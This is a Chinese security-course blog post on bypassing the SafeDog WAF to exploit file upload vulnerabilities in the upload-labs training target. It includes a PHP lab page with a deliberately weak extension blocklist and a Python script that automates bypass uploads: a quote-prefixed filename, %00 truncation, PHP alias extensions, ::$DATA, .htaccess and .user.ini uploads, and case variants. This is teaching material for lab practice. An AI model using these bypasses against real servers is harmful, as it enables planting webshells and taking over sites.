热门标签
热门文章
- 1Codeforces Round #142 Div.2 题解_codeforces round #142 (div. 1) 题解
- 2win10安装tensorflow-gpu环境_cudnn-10.1-windows10-x64-v7.6.4.38.zip
- 3A Painless Q-learning Tutorial (一个 Q-learning 算法的简明教程)
- 4cleanmymacX4.15.5破解版安装激活图文教程 2024最新详细CleanMyMac 激活码_cleanmymacx怎么激活
- 5大模型算法方向实习会经常提问哪些问题? ?
- 6方法教程 | Python爬虫:爬取某易云数据并且可视化展示_爬虫加可视化展示摄影图片
- 7百度旋转验证码
- 82024年C C++最全MDK编译过程及ARM编译工具链_mdk arm c++,2024年最新C C++开发者跳槽必备_mdk c++
- 9【Leetcode 1893 】 检查是否区域内所有整数都被覆盖
- 10免费开源的AI绘画工具ComfyUI,让AI作画变得简单又快捷
当前位置: article > 正文
【小迪安全】Day24web漏洞-文件上传漏洞之WAF绕过_小迪文件上传变量替换绕过waf
作者:喵喵爱编程 | 2024-08-28 18:56:36
赞
踩
小迪文件上传变量替换绕过waf
web漏洞-文件上传漏洞之WAF绕过
文章目录
前言
上篇文章【小迪安全】Day18-23web漏洞-文件上传介绍了文件上传漏洞基本类型,这次介绍文件上传漏洞的WAF绕过方法。
绕过安全狗
缓存溢出-加垃圾数据(经手动测试,此方法已经失效)
主要方法是在Content-Disposition参数后面加一堆垃圾数据测试安全狗能不能顶的住,经测试这个方法已经失效了。
符号变异
主要测试思路是用"截断文件名,看是否能绕过安全狗。
数据截断-防匹配(%00 ; 换行;/)(经手动测试,不行了,不排除fuzz测试时可以的可能性)
一个思路,只要不让安全狗匹配到.php即可。%00要求版本太低了,这边不测试了。
重复数据-参数多次(经测试,已经失效)
主要就是借用类似url参数污染的机制看能不能绕过安全狗的检查。
fuzz测试
测试思路和SQL注入绕过测试思路一致,先确定是什么原因导致的被拦截,再通过一些特殊的字符等绕过拦截原因。以upload-labs靶场的第6关举例,此关卡正常使用后缀名大小写即可绕过。测试一下加了安全狗后应该怎么绕过。
抓一下正常的数据包
判断拦截原因
测试了1.php、1.3php、1.php.png、1php.png四个名字,可以发现安全狗是匹配到.php字符串做的拦截。
fuzz爆破
经测试,upload-labs靶场使用爆破模块什么变量都有可能绕过去,但是实际repeater模块重新测试又不行了,可能是安全狗对upload-labs靶场做了动作,也可能是快速重复请求绕过去了?我模仿upload-labs的写了个脚本测试,主要去掉了页眉页脚,pass-xx等标识信息,结果是一致的,基本确定是连续请求绕过了安全狗的拦截,太暴力了,感觉没什么用。而在后缀名前面加特殊字符的方法,除了双引号和单引号,其它字符基本没用。
模仿写个脚本确定原因
<?php
include 'config.php';
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
echo "此处打印_FILES['upload_file']['name']<br>";
echo $_FILES['upload_file']['name'];
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
?>
<div id="upload_panel">
<ol>
<li>
<h3>任务</h3>
<p>上传一个<code>webshell</code>到服务器。</p>
</li>
<li>
<h3>上传区</h3>
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
<p>请选择要上传的图片:<p>
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="上传"/>
</form>
<div id="msg">
<?php
if($msg != null){
echo "提示:".$msg;
}
?>
</div>
<div id="img">
<?php
if($is_upload){
#echo '<img src="'.$img_path.'" width="250px" />';
echo "上传成功啦";
}
?>
</div>
</li>
<?php
if($_GET['action'] == "show_code"){
include 'show_code.php';
}
?>
</ol>
</div>
使用字典
fuzz爆破当然也可以使用字典,使用方法这边就不演示了。字典可以在github上面找https://github.com/TheKingOfDuck/fuzzDicts之类的。
编写脚本
经过上述测试,我们使用双引号绕过的方法来编写脚本,基础脚本在上篇文章【小迪安全】Day18-23web漏洞-文件上传已经写好了,这里加个开关就好了。
import requests
from urllib3.fields import RequestField
from urllib3 import encode_multipart_formdata
# 是否绕过安全狗开关
pass_dog_flag = True
pass_str = ""
if pass_dog_flag:
pass_str = "\""
# 挂个代理方便使用burp抓包分析
proxies = {'http': 'http://127.0.0.1:8888'}
pass_num_str = "09"
url = "http://localhost:8084/Pass-"+pass_num_str+"/index.php"
# boundary='---------------------------29377857821120'
def strSort(words):
tempword = words
for i in range(2**len(words)):
int_bin = str(bin(i)).replace("0b","")
for i in range(len(words)-len(int_bin)):
int_bin = "".join(("0",int_bin))
for index, i in enumerate(int_bin):
if i=='1':
wordslst = list(words)
wordslst[index] = wordslst[index].upper()
words = "".join(wordslst)
yield words
words = tempword
def getFiledList( mime, fileName, filePath):
heards_upload_file = {
"Content-Disposition": 'form-data; name="%s"; filename="%s"' % ("upload_file", fileName),
"Content-Type": mime,
}
heards_submit = {
"Content-Disposition": 'form-data; name="%s"' % ("submit"),
}
upload_file_field = RequestField("upload_file", open(filePath, 'rb').read(), None, heards_upload_file)
submit_field = RequestField("submit", "上传", None, heards_submit)
field_list = [upload_file_field, submit_field]
return field_list
def getBodyAndHeader(mime="application/octet-stream", fileName="test.php", filePath="D:\\test.php"):
field_list = getFiledList(mime=mime, fileName=pass_str+fileName, filePath=filePath)
body, content_type = encode_multipart_formdata(field_list)
header = {
"Host":"localhost:8084",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
"Referer":"http://localhost:8084/Pass-03/index.php",
"DNT":"1",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Content-Type":content_type,
# "Content-Type":"multipart/form-data; boundary="+m[1],
}
return body, header
def scan_orign():
print("---开始检查原始的请求---")
body,header = getBodyAndHeader()
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_mime(allowMime="image/png"):
print("---开始检查mime---")
body,header = getBodyAndHeader(mime=allowMime)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_00():
print("---开始扫描%00截断---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php%00.png")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_php_other_name():
print("---开始扫描php别名---")
php_other_name_list = ["php3", "php5" , "phtml"]
for item in php_other_name_list:
body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("php别名%s返回网页长度:%s" % (item, len(text)))
else:
print("请求出错!!!")
def scan_point():
print("---开始扫描点绕过---")
point_list = [".", ". ", ". ."]
for item in point_list:
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php"+item)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("扫描点绕过"+item+"返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_space():
print("---开始扫描空格绕过---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php ")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_data():
print("---开始扫描$DATA绕过---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php::$DATA")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_duble_suffix():
print("---开始扫描双后缀名绕过---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".phpphp")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_htaccess():
print("---开始扫描htaccess绕过---")
body,header = getBodyAndHeader(fileName=".htaccess", filePath="D:\\.htaccess")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_userini():
print("---开始扫描.user.ini绕过---")
body,header = getBodyAndHeader(fileName=".user.ini", filePath="D:\\.user.ini")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_suffix_case():
print("---开始扫描后缀大小写绕过---")
for item in strSort("php"):
body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("扫描后缀大小写%s网页长度:%s" % (item, len(text)))
else:
print("请求出错!!!")
def scan_all(url):
scan_orign()
scan_mime()
scan_00()
scan_php_other_name()
scan_point()
scan_space()
scan_data()
scan_duble_suffix()
scan_htaccess()
scan_userini()
scan_suffix_case()
def run(url):
scan_all(url)
if __name__ == '__main__':
run(url)
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/喵喵爱编程/article/detail/1021824
推荐阅读
相关标签
